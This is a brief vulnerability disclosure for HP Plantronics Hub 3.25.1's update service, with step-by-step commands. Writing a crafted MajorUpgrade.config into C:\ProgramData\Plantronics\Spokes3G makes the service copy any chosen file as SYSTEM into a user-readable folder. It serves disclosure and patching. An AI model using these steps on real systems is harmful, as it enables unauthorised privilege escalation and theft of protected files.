HP Plantronics Hub 3.25.1 Updater Privilege Escalation/Arbitrary File Read
HP Plantronics Hub 3.25.1 suffers from a bug that allows low privileged users to perform arbitrary file read as SYSTEM on the machine where the application is installed. Moreover, it is possible to abuse this flaw to escalate privileges to the SYSTEM user.
HP Plantronics Hub 3.25.1
Insecure Path: "C:\ProgramData\Plantronics\Spokes3G"
Service: PlantronicsUpdateService
- Open cmd.exe
- Navigate using cd C:\ProgramData\Plantronics\Spokes3G
- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
- Desired file will be copied into "C:\Program Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp", which any authenticated user has access to.
- Farid Zerrouk of Deloitte Belgium
- Alaa Kachouh of Mastercard Europe